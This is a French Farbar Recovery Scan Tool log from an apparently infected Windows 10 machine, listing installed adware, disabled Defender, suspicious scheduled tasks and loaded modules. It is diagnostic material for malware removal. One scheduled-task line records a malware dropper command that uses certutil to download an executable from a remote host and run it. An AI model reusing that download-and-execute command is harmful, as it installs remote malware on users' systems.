Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version: 10.02.2019 01
Exécuté par xerya (31-05-2019 15:33:09)
Exécuté depuis C:\Users\xerya\Downloads
Windows 10 Enterprise Version 1803 17134.765 (X64) (2018-12-24 08:21:46)
Mode d'amorçage: Normal
==========================================================


==================== Comptes: =============================

Administrateur (S-1-5-21-874736629-648952403-2601760554-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-874736629-648952403-2601760554-503 - Limited - Disabled)
Invité (S-1-5-21-874736629-648952403-2601760554-501 - Limited - Disabled)
WDAGUtilityAccount (S-1-5-21-874736629-648952403-2601760554-504 - Limited - Disabled)
xerya (S-1-5-21-874736629-648952403-2601760554-1001 - Administrator - Enabled) => C:\Users\xerya

==================== Centre de sécurité ========================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.)

AV: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programmes installés ======================

(Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.)

7-Zip 18.05 (x64) (HKLM\...\7-Zip) (Version: 18.05 - Igor Pavlov)
Adobe Acrobat Reader DC - Français (HKLM-x32\...\{AC76BA86-7AD7-1036-7B44-AC0F074E4100}) (Version: 19.012.20034 - Adobe Systems Incorporated)
Chromium (HKLM-x32\...\{B6645EA4-E6E4-8F24-5764-FFA487E42C24}) (Version:  - )
CloudNet (HKU\S-1-5-21-874736629-648952403-2601760554-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
DiskProtect9527 version 10.16 (HKLM-x32\...\{BA260FCE-F1C0-42D5-BD87-EB3EDF11252F}_is1) (Version: 10.16 - )
DreamTrips version 2.12 (HKLM-x32\...\{13E374E4-E610-4F9E-ACC4-E461DA17D869}_is1) (Version: 2.12 - DreamTrips Inc)
FastDataX 1.20 (HKLM-x32\...\FastDataX_is1) (Version: 1.20 - ) <==== ATTENTION
foldershare (HKLM\...\foldershare) (Version: 1.1 - foldershare) <==== ATTENTION
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 74.0.3729.169 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden
KMSpico (HKLM\...\{8B29D47F-92E2-4C20-9EE0-F710991F5D7C}_is1) (Version:  - )
Microsoft Office Professionnel Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-874736629-648952403-2601760554-1001\...\OneDriveSetup.exe) (Version: 19.070.0410.0007 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mobile Broadband HL Service (HKLM-x32\...\Mobile Broadband HL Service) (Version: 22.001.29.01.03 - Huawei Technologies Co.,Ltd)
Module linguistique Microsoft Visual Studio 2010 Tools pour Office Runtime (x64) - FRA (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - FRA) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 60.4.0 - Mozilla)
Mozilla Thunderbird 60.6.1 (x86 fr) (HKLM-x32\...\Mozilla Thunderbird 60.6.1 (x86 fr)) (Version: 60.6.1 - Mozilla)
NativeDesktopMediaService (HKLM-x32\...\{4CF9B388-78FA-46C3-B409-196FE2CF5F20}) (Version: 3.6.0 - Jetmedia) <==== ATTENTION
One System Care (HKLM-x32\...\OneSystemCare_is1) (Version: 4.4.0.3 - One System Care) <==== ATTENTION
Online Application (HKLM-x32\...\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}) (Version: 2.7.0 - Microleaves) Hidden <==== ATTENTION
Opera Stable 58.0.3135.127 (HKU\S-1-5-21-874736629-648952403-2601760554-1001\...\Opera 58.0.3135.127) (Version: 58.0.3135.127 - Opera Software)
Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM\...\{90150000-001F-040C-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
SearchAwesome (HKLM-x32\...\NTMwMjE2ZW) (Version: 13.14.1.318 (i1.0) - SearchAwesome) <==== ATTENTION
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version:  - Microsoft)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.19.63 - Synaptics Incorporated)
Update for Skype for Business 2015 (KB4464547) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{2A5F57FD-DB91-4010-9161-93639D305C0B}) (Version:  - Microsoft)
Update for Skype for Business 2015 (KB4464547) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{2A5F57FD-DB91-4010-9161-93639D305C0B}) (Version:  - Microsoft)
Update for Skype for Business 2015 (KB4464547) 64-Bit Edition (HKLM\...\{90150000-012B-040C-1000-0000000FF1CE}_Office15.PROPLUS_{2A5F57FD-DB91-4010-9161-93639D305C0B}) (Version:  - Microsoft)
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.6 - VideoLAN)
Windows KMS Activator Ultimate 2018 4.0 (HKLM\...\Windows KMS Activator Ultimate 2018 4.0_is1) (Version: 4.0 - )
WinRAR 5.70 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.70.0 - win.rar GmbH)

==================== Personnalisé CLSID (Avec liste blanche): ==========================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

CustomCLSID: HKU\S-1-5-21-874736629-648952403-2601760554-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation - pGFX -> Intel Corporation)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Pas de fichier
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-02-24] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-02-24] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov)
ContextMenuHandlers4: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-02-24] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers4-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-02-24] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Pas de fichier
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2015-07-30] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-02-24] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-02-24] (win.rar GmbH -> Alexander Roshal)

==================== Tâches planifiées (Avec liste blanche) =============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

Task: {08F0B85F-9EEB-45A4-A2EF-D00A184F3AC6} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {107A2309-F16B-4A08-B303-DED04BDE8AEA} - System32\Tasks\Online Application V2G6 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {2094B8CC-E947-4328-9A14-208A4C071AAD} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe () [Fichier non signé] <==== ATTENTION
Task: {20EBB11C-7D66-42D2-A5EA-37982CA9EAB8} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1904.1-0\MpCmdRun.exe (Microsoft Corporation -> Microsoft Corporation)
Task: {29BDF215-CF2B-4501-BAFA-5346D0541496} - System32\Tasks\AutoPico Daily Restart => C:\Program Files\KMSpico\AutoPico.exe (@ByELDI -> @ByELDI) [Fichier non signé]
Task: {2CD56873-73F0-410A-9794-B9CEA936453B} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe () [Fichier non signé] <==== ATTENTION
Task: {363A1B7B-7A2B-4BAE-96BC-7C2D9D420AD1} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe (AVAST Software s.r.o. -> AVAST Software)
Task: {42B53B86-C54A-4C9B-BF46-30DA197A0B23} - System32\Tasks\Opera scheduled Autoupdate 1552112270 => C:\Users\xerya\AppData\Local\Programs\Opera\launcher.exe (CryptCATAdminCalcHashFromFileHandle failed to return cbHash, #2 -> )
Task: {4BEA8B82-DBD9-452A-9095-293206198879} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe (Microsoft Corporation -> Microsoft Corporation)
Task: {4CCEE4B5-E12A-4626-BCE2-00D63726C2D2} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe (Microsoft Corporation -> Microsoft Corporation)
Task: {4D67DD6F-C235-4ED5-80F2-007728F08429} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {6CD0C90C-C73C-483D-A725-B37A98A35F41} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://nevernews.club/app/app.exe C:\Users\xerya\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\xerya\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {720BC6BE-3EAE-4FD5-9EF7-DBCE7200C71B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1904.1-0\MpCmdRun.exe (Microsoft Corporation -> Microsoft Corporation)
Task: {7518AE06-BE8B-4ADE-A354-95173730F4C5} - System32\Tasks\Opera scheduled assistant Autoupdate 1552901463 => C:\Users\xerya\AppData\Local\Programs\Opera\launcher.exe (CryptCATAdminCalcHashFromFileHandle failed to return cbHash, #2 -> )
Task: {787BB8A9-A881-4D32-82F7-D4D7A7811B11} - System32\Tasks\Online Application V2G4 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {7CCB8F76-A825-4A0A-8333-E2B7A8C8DF10} - System32\Tasks\{067E1A8D-4D45-47C0-A2DB-BE66DB28F7B2} => C:\ProgramData\1976721434728161037\watchdog.exe () [Fichier non signé]
Task: {8344A6A6-A675-46B8-8CB4-21FA77E2896E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1904.1-0\MpCmdRun.exe (Microsoft Corporation -> Microsoft Corporation)
Task: {8556A2E8-DB8F-43BC-B115-2A426A762E0D} - System32\Tasks\Microsoft\Windows\Flighting\FeatureConfig\ReconcileFeatures
Task: {8D0880ED-9B02-4DC4-9B31-EC37D3F3D383} - System32\Tasks\1DDD8888-88C2-5F49-3871-9822B701B2F4 => C:\Windows\SysWOW64\regsvr32.exe /n /s /i:"/5eedcdb2dd10bbba /q" "C:\PROGRA~3\11C277~1\{07CFC~1."
Task: {9A051AE6-E45A-4835-B790-0A47D53A5458} - System32\Tasks\One System CarePeriod => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe () [Fichier non signé] <==== ATTENTION
Task: {9E04C3E6-95E6-4C8A-81AA-7EAED86FA80E} - System32\Tasks\Online Application V2G5 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {A2B7C72E-A307-4B9A-A1FC-DC4FE83F4C95} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe (MICROLEAVES LTD -> ) <==== ATTENTION
Task: {A697C228-F2AB-43D7-BF6B-61F7A8E75704} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Task: {A738B262-5307-446F-9565-0002ACBFAA98} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe (Microsoft Corporation -> Microsoft Corporation)
Task: {B6CD6E36-555B-4462-A8BE-BABBF890BC25} - System32\Tasks\One System Care Delayed => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe () [Fichier non signé] <==== ATTENTION
Task: {BD74139F-80A7-4972-8D38-498CBD900C39} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.)
Task: {CDDFCA62-B9C7-4F01-B1DC-B2BD1CD68F92} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.)
Task: {D269B46D-34B4-4FD3-8D4D-B2808D20E567} - System32\Tasks\UpdTask\{2B559FBC-C1D9-7F69-A1AE-587ECF815B1A} => C:\Users\xerya\AppData\Roaming\Medodala\UpdTask.exe () [Fichier non signé] <==== ATTENTION
Task: {E4456269-FC70-4CC6-BF06-787201CBCF46} - System32\Tasks\Opera scheduled Autoupdate 711520318 => C:\Users\xerya\AppData\Roaming\Microsoft\Windows\ibgwjjsw\vasiggjd.exe (Blade API Monitor) [Fichier non signé]
Task: {ECB60CE5-7A67-4870-83EF-FBF0F5B9F9D4} - System32\Tasks\Time Trigger Task => C:\Users\xerya\AppData\Local\0db18d45-4b65-4d22-88dd-36dbd8039ee8\2692.tmp.exe () [Fichier non signé]
Task: {EE50EEB9-D4AA-4AE8-A1A9-7DCE7A958EFF} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe (MICROLEAVES LTD -> Microleaves) <==== ATTENTION
Task: {F5D79BD3-E944-4280-B85D-7B2F4CB9E39C} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1904.1-0\MpCmdRun.exe (Microsoft Corporation -> Microsoft Corporation)

(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)

Task: C:\Windows\Tasks\One System CarePeriod.job => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G4.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G5.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G6.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== ATTENTION

==================== Raccourcis & WMI ========================

(Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.)


ShortcutWithArgument: C:\Users\xerya\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\Users\xerya\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic

==================== Modules chargés (Avec liste blanche) ==============

2019-02-11 19:38 - 2016-03-24 02:54 - 000242264 _____ () C:\Program Files (x86)\MobileBrServ\mbbservice.exe
2019-05-28 07:53 - 2019-05-28 07:53 - 001063936 _____ () C:\Program Files\NTMwMjE2ZW\Yzk0YWE0ZmVlNGZhN.exe
2019-05-28 15:40 - 2019-05-28 15:40 - 001435136 ____H () C:\Windows\windefender.exe
2019-05-29 19:05 - 2019-05-27 13:40 - 001975296 _____ () C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe
2018-04-11 23:34 - 2018-04-11 23:34 - 000491744 _____ () C:\Windows\SYSTEM32\inputhost.dll
2018-04-11 23:34 - 2018-04-11 23:34 - 000472064 _____ () C:\Windows\ShellExperiences\TileControl.dll
2018-12-26 11:25 - 2018-11-09 02:17 - 002759680 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll
2019-05-17 17:28 - 2019-05-03 05:56 - 002185728 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2019-05-07 18:43 - 2019-05-07 18:57 - 000182272 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.44.40.1000_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
2019-05-07 18:43 - 2019-05-07 18:57 - 000019456 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.44.40.1000_x64__kzf8qxf38zg5c\SkypeProxiesAndStubs.dll
2019-04-04 11:06 - 2019-04-04 11:06 - 026138624 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19031.11411.0_x64__8wekyb3d8bbwe\Video.UI.exe
2019-04-04 11:03 - 2019-04-04 11:04 - 000289280 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19031.11411.0_x64__8wekyb3d8bbwe\SharedUI.dll
2018-04-12 16:29 - 2018-04-12 16:29 - 000902656 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19031.11411.0_x64__8wekyb3d8bbwe\Microsoft.Membership.MeControl.UI.Xaml.dll
2018-12-24 10:02 - 2018-12-24 10:12 - 004202208 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19031.11411.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll
2019-04-04 11:03 - 2019-04-04 11:03 - 005709824 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19031.11411.0_x64__8wekyb3d8bbwe\EntCommon.dll
2019-04-04 11:03 - 2019-04-04 11:03 - 008948224 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19031.11411.0_x64__8wekyb3d8bbwe\EntPlat.dll
2019-05-28 15:34 - 2019-05-28 15:34 - 005151232 _____ () C:\Windows\rss\csrss.exe
2019-05-28 15:34 - 2019-05-28 14:56 - 000080384 _____ () C:\Users\xerya\AppData\Local\Temp\cjgnvxtd.alc\DiskProtect9527\adsSeed.exe
2017-11-02 10:51 - 2017-11-02 10:51 - 000199864 _____ () C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe
2019-04-30 16:08 - 2019-04-30 16:35 - 000481280 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19031.17720.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
2019-04-30 16:08 - 2019-04-30 16:35 - 081356800 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19031.17720.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll
2018-12-24 11:04 - 2018-12-24 12:32 - 002523136 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19031.17720.0_x64__8wekyb3d8bbwe\UnityEngineDelegates.dll
2019-04-30 16:08 - 2019-04-30 16:36 - 000012288 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19031.17720.0_x64__8wekyb3d8bbwe\RenderingPlugin.dll
2019-04-30 16:08 - 2019-04-30 16:17 - 003707904 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19031.17720.0_x64__8wekyb3d8bbwe\MediaEngineCSWrapper.dll
2019-04-30 16:08 - 2019-04-30 16:36 - 013491200 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19031.17720.0_x64__8wekyb3d8bbwe\PhotosApp.Windows.dll
2019-04-30 16:08 - 2019-04-30 16:15 - 002867712 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19031.17720.0_x64__8wekyb3d8bbwe\AppCore.Windows.dll
2019-04-30 16:08 - 2019-04-30 16:36 - 001014784 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19031.17720.0_x64__8wekyb3d8bbwe\RuntimeConfiguration.dll
2019-04-30 16:08 - 2019-04-30 16:15 - 000120320 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19031.17720.0_x64__8wekyb3d8bbwe\AppSettingsCppCX.dll
2018-12-24 11:07 - 2018-12-24 11:08 - 004380232 _____ () C:\Program Files\WindowsApps\Microsoft.UI.Xaml.2.0_2.1810.18004.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll
2019-05-06 15:37 - 2019-05-06 15:42 - 000273408 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11904.1001.1.0_x64__8wekyb3d8bbwe\WinStore.Preview.dll
2018-12-24 11:19 - 2018-12-24 11:19 - 002538056 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11904.1001.1.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll
2019-01-30 11:15 - 2019-01-30 11:17 - 001757696 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11904.1001.1.0_x64__8wekyb3d8bbwe\Microsoft.Membership.MeControl.dll
2019-03-29 16:28 - 2019-03-29 16:47 - 000760832 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\WinUAPEntry.exe
2018-12-24 11:14 - 2018-12-24 11:16 - 000009216 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.44.40.1000_x64__kzf8qxf38zg5c\ImagePipelineNative.dll
2019-05-07 18:43 - 2019-05-07 18:43 - 000060416 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.44.40.1000_x64__kzf8qxf38zg5c\ChakraBridge.dll
2019-05-07 18:43 - 2019-05-07 18:43 - 010367488 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.44.40.1000_x64__kzf8qxf38zg5c\LibWrapper.dll
2019-05-07 18:43 - 2019-05-07 18:57 - 002992128 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.44.40.1000_x64__kzf8qxf38zg5c\skypert.dll
2019-05-07 18:43 - 2019-05-07 18:43 - 000677376 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.44.40.1000_x64__kzf8qxf38zg5c\RtmMvrUap.dll
2019-02-15 14:59 - 2019-02-15 14:59 - 002362096 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.44.40.1000_x64__kzf8qxf38zg5c\Processing.NDI.Lib.UWP.x64.dll
2019-05-28 15:36 - 2019-05-28 15:34 - 000446464 _____ () C:\Users\xerya\AppData\Local\0db18d45-4b65-4d22-88dd-36dbd8039ee8\2692.tmp.exe
2019-05-28 15:34 - 2019-05-28 15:34 - 001614336 _____ () C:\Windows\otkbfoeznmvpt.otk
2019-05-28 15:40 - 2017-10-10 10:05 - 003148800 _____ () C:\Users\xerya\AppData\Local\chromium\Application\63.0.3237.0\libglesv2.dll
2019-05-28 15:40 - 2017-10-10 10:05 - 000078848 _____ () C:\Users\xerya\AppData\Local\chromium\Application\63.0.3237.0\libegl.dll
2019-03-29 16:28 - 2019-03-29 16:52 - 000147456 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\WP8MSVCCommon.dll
2019-03-29 16:28 - 2019-03-29 16:52 - 000372736 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\WP8MSVCBridge.dll
2019-03-29 16:28 - 2019-03-29 16:47 - 000013312 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\WinPhoneBridge_osmeta.dll
2019-03-29 16:28 - 2019-03-29 16:45 - 000883200 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\System_osmeta.dll
2019-03-29 16:28 - 2019-03-29 16:44 - 000040448 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\pthreadVC_osmeta.dll
2019-03-29 16:28 - 2019-03-29 16:44 - 000113664 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\system_malloc_osmeta.dll
2019-03-29 16:28 - 2019-03-29 16:41 - 000816640 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\CrossPortability_osmeta.dll
2019-03-29 16:28 - 2019-03-29 16:44 - 064193536 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\osmeta.dll
2019-03-29 16:28 - 2019-03-29 16:45 - 000015872 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\unwind_osmeta.dll
2019-03-29 16:28 - 2019-03-29 16:41 - 000998400 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\ffmpeg_osmeta.dll
2019-03-29 16:28 - 2019-03-29 16:41 - 000875008 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\c++_osmeta.dll
2019-03-29 16:28 - 2019-03-29 16:41 - 000087040 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\exif_osmeta.dll
2019-03-29 16:28 - 2019-03-29 16:52 - 000096768 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\z_osmeta.dll
2019-03-29 16:28 - 2019-03-29 16:45 - 000368128 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\SystemResources_osmeta.dll
2019-03-29 16:28 - 2019-03-29 16:52 - 000098304 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\WRTBridge_osmeta.dll
